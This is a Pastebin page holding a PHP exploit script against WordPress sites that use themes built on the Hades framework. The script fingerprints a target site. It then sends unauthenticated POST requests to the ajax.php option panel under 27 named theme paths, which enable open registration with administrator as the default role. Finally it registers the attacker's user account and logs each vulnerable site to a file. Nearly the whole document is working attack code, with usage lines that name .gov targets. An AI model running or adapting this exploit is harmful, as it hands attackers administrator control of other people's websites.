Advertisement
Googleinurl

[EXPLOIT]=> Wordpress -Hades Plus Add ADM / INURL - BRASIL

Sep 18th, 2014
2,378
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 8.17 KB | None | 0 0
  1. <?php
  2. /*
  3. ----------------------------------------------------------
  4. *NAME*: Wordpress -Hades Plus Add ADM / INURL - BRASIL
  5. *TIPE*: User improper inclusion
  6. *Tested on*: Linux
  7. *EXECUTE*: php exploit.php http://www.target.us you@mail.com
  8. *OUTPUT*: 0day_Hades_Plus_Framework_Add_Administrator.txtt
  9. *AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
  10. *EMAIL*: inurllbr@gmail.com
  11. *Blog*: http://blog.inurl.com.br
  12. *Twitter*: https://twitter.com/googleinurl
  13. *Fanpage*: https://fb.com/InurlBrasil
  14. *GIT*: https://github.com/googleinurl
  15. *YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  16. *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
  17. ----------------------------------------------------------
  18.  
  19. *Description:*
  20. This exploit allows an attacker to add new users through the /hades_framework/option_panel/ajax.php way sending request post completed.
  21. This failure is in bristle web 27 Themas:
  22. appius,Consultant,appius1,archin,averin,dagda,echea,felici,GantiDengantema,kmp,kmp2,themanya,liberal,liberal-media-bias,linguini,livewire,majestics,mathis,mazine,
  23. Orchestra, shopsum, shotzz, test, Viteeo, vithy, yvora, sodales.
  24. ----------------------------------------------------------
  25.  
  26. *Usage Information:*
  27. php exploit.php http://www.target.gov.us you@mail.com
  28.  
  29. Logic:
  30. $ params ['email'] = 'you_email';
  31. $ params ['user'] = 'inurlbrasil';
  32.  
  33. EXPLOIT POST:
  34. values[0][name]=users_can_register&values[0][value]=1&values[1][name]=admin_email&values[1][value]={$params['email']}&values[2][name]=default_role&values[2][value]=administrator&action=save;
  35.  
  36. if (result the requisition == success) {
  37. is a possible vulnerable and sent one Feedback activation of inurlbrasil usuraio.
  38. }
  39. ----------------------------------------------------------
  40. */
  41. error_reporting(1);
  42. set_time_limit(0);
  43. ini_set('display_errors', 1);
  44. ini_set('max_execution_time', 0);
  45. ini_set('allow_url_fopen', 1);
  46. ob_implicit_flush(true);
  47. ob_end_flush();
  48.  
  49. $params = array();
  50.  
  51. $params['email'] = $argv[2];
  52. $params['user'] = 'inurlbrasil';
  53. $params['post'] = "values%5B0%5D%5Bname%5D=users_can_register&values%5B0%5D%5Bvalue%5D=1&values%5B1%5D%5Bname%5D=admin_email&values%5B1%5D%5Bvalue%5D={$params['email']}&values%5B2%5D%5Bname%5D=default_role&values%5B2%5D%5Bvalue%5D=administrator&action=save";
  54.  
  55. $corpo = file_get_contents($argv[1]);
  56. !(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i", $argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL') : NULL;
  57.  
  58. preg_match_all("#WordPress (.*?)/>#", $alvo_[0][0], $version);
  59. $str = str_replace('/>', '', $version[0]);
  60. $str = str_replace('"', '', $str);
  61. $users = file_get_contents("{$alvo_[0][0]}/?author=1");
  62. preg_match('/<title>(.*?)<\/title>/si', $users, $user);
  63. $wpuser = explode('|', $user[1]);
  64. $headers = get_headers($argv[1], 1);
  65. print "\r\n0x[EXPLOIT NAME]: WordPress 0day - Hades Plus Framework Add Administrator / INURL - BRASIL";
  66. print "\n--------------------------------------------------------------------------------------------------";
  67. print "\n0x[INFO]: ";
  68. print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
  69. print "\n0x[INFO]: ";
  70. is_array($headers['Server']) ? print_r($headers['Server'][0]) : print_r($headers['Server']);
  71. print "\n0x[INFO]: ";
  72. is_array($headers['X-Pingback']) ? print_r($headers['X-Pingback'][0]) : print_r($headers['X-Pingback']);
  73. print "\n0x[INFO]: ";
  74. is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) : print_r($headers['X-Powered-By']);
  75. print "\n0x[INFO]: TARGET: {$alvo_[0][0]} | WP USER: " . str_replace("\n", '', $wpuser[0]) . " | VERSION: {$str} \n";
  76.  
  77.  
  78. __request($alvo_[0][0], '/wp-content/themes/appius/hades_framework/option_panel/ajax.php', $params);
  79. __request($alvo_[0][0], '/wp-content/themes/Consultant/hades_framework/option_panel/ajax.php', $params);
  80. __request($alvo_[0][0], '/wp-content/themes/appius1/hades_framework/option_panel/ajax.php', $params);
  81. __request($alvo_[0][0], '/wp-content/themes/archin/hades_framework/option_panel/ajax.php', $params);
  82. __request($alvo_[0][0], '/wp-content/themes/averin/hades_framework/option_panel/ajax.php', $params);
  83. __request($alvo_[0][0], '/wp-content/themes/dagda/hades_framework/option_panel/ajax.php', $params);
  84. __request($alvo_[0][0], '/wp-content/themes/echea/hades_framework/option_panel/ajax.php', $params);
  85. __request($alvo_[0][0], '/wp-content/themes/felici/hades_framework/option_panel/ajax.php', $params);
  86. __request($alvo_[0][0], '/wp-content/themes/GantiDengantema/hades_framework/option_panel/ajax.php', $params);
  87. __request($alvo_[0][0], '/wp-content/themes/kmp/hades_framework/option_panel/ajax.php', $params);
  88. __request($alvo_[0][0], '/wp-content/themes/kmp2/hades_framework/option_panel/ajax.php', $params);
  89. __request($alvo_[0][0], '/wp-content/themes/themanya/hades_framework/option_panel/ajax.php', $params);
  90. __request($alvo_[0][0], '/wp-content/themes/liberal/hades_framework/option_panel/ajax.php', $params);
  91. __request($alvo_[0][0], '/wp-content/themes/liberal-media-bias/hades_framework/option_panel/ajax.php', $params);
  92. __request($alvo_[0][0], '/wp-content/themes/linguini/hades_framework/option_panel/ajax.php', $params);
  93. __request($alvo_[0][0], '/wp-content/themes/livewire/hades_framework/option_panel/ajax.php', $params);
  94. __request($alvo_[0][0], '/wp-content/themes/majestics/hades_framework/option_panel/ajax.php', $params);
  95. __request($alvo_[0][0], '/wp-content/themes/mathis/hades_framework/option_panel/ajax.php', $params);
  96. __request($alvo_[0][0], '/wp-content/themes/mazine/hades_framework/option_panel/ajax.php', $params);
  97. __request($alvo_[0][0], '/wp-content/themes/Orchestra/hades_framework/option_panel/ajax.php', $params);
  98. __request($alvo_[0][0], '/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php', $params);
  99. __request($alvo_[0][0], '/wp-content/themes/shotzz/hades_framework/option_panel/ajax.php', $params);
  100. __request($alvo_[0][0], '/wp-content/themes/test/hades_framework/option_panel/ajax.php', $params);
  101. __request($alvo_[0][0], '/wp-content/themes/Viteeo/hades_framework/option_panel/ajax.php', $params);
  102. __request($alvo_[0][0], '/wp-content/themes/vithy/hades_framework/option_panel/ajax.php', $params);
  103. __request($alvo_[0][0], '/wp-content/themes/yvora/hades_framework/option_panel/ajax.php', $params);
  104. __request($alvo_[0][0], '/wp-content/themes/sodales/hades_framework/option_panel/ajax.php', $params);
  105.  
  106. function __request($url, $plugin, $params) {
  107.  
  108.     $objcurl = curl_init();
  109.     curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
  110.     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
  111.     curl_setopt($objcurl, CURLOPT_HEADER, 0);
  112.     curl_setopt($objcurl, CURLOPT_HTTPHEADER, array(
  113.         'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  114.         'Accept: application/json, text/javascript, */*; q=0.01',
  115.         'X-Requested-With: XMLHttpRequest',
  116.         "Referer: {$url}",
  117.         'Accept-Language: en-US,en;q=0.5',
  118.         'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
  119.     ));
  120.     curl_setopt($objcurl, CURLOPT_REFERER, $url . $plugin);
  121.     curl_setopt($objcurl, CURLOPT_POSTFIELDS, $params['post']);
  122.  
  123.     $corpo = curl_exec($objcurl);
  124.     curl_close($objcurl);
  125.  
  126.     if (strstr($corpo, 'success')) {
  127.  
  128.         $res = "\n--------------------------------------------------------------------------------------------------------------------------------------------------------------------\n0x[INFO][VULN]: [ " . date("d-m-Y H:i:s") . " ]\n";
  129.         $res.= "\n0x[INFO][VULN]: {$url}{$plugin} - RETURN=> [ {$corpo} ] / {$params['user']}, EMAIL=> " . urldecode($params['email']);
  130.         $res.= "\n--------------------------------------------------------------------------------------------------------------------------------------------------------------------\n";
  131.         print $res;
  132.         $admin['post'] = urlencode("user_login={$params['user']}&user_email={$params['email']}&redirect_to=&wp-submit=Inscription");
  133.         (strstr($corpo, 'success') ? __request($url, '/wp-login.php?action=register', $admin) : NULL);
  134.         file_put_contents('0day_Hades_Plus_Framework_Add_Administrator.txt', "{$res}\n", FILE_APPEND);
  135.     } else {
  136.         print (($plugin != '/wp-login.php?action=register') ?  "\n0x[INFO][NOT VULN]: {$url}{$plugin} "  : NULL);
  137.     }
  138. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement